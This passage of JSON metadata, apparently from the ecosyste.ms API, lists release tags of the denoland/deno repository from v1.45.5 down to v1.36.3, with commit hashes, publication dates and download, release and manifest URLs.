rl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","t